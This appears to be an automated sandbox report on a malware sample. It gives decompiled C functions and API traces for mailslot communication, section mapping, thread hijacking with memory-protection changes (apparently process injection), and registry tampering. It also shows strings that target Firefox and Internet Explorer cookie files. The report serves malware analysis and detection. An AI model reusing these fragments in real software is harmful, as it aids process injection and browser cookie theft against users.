  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
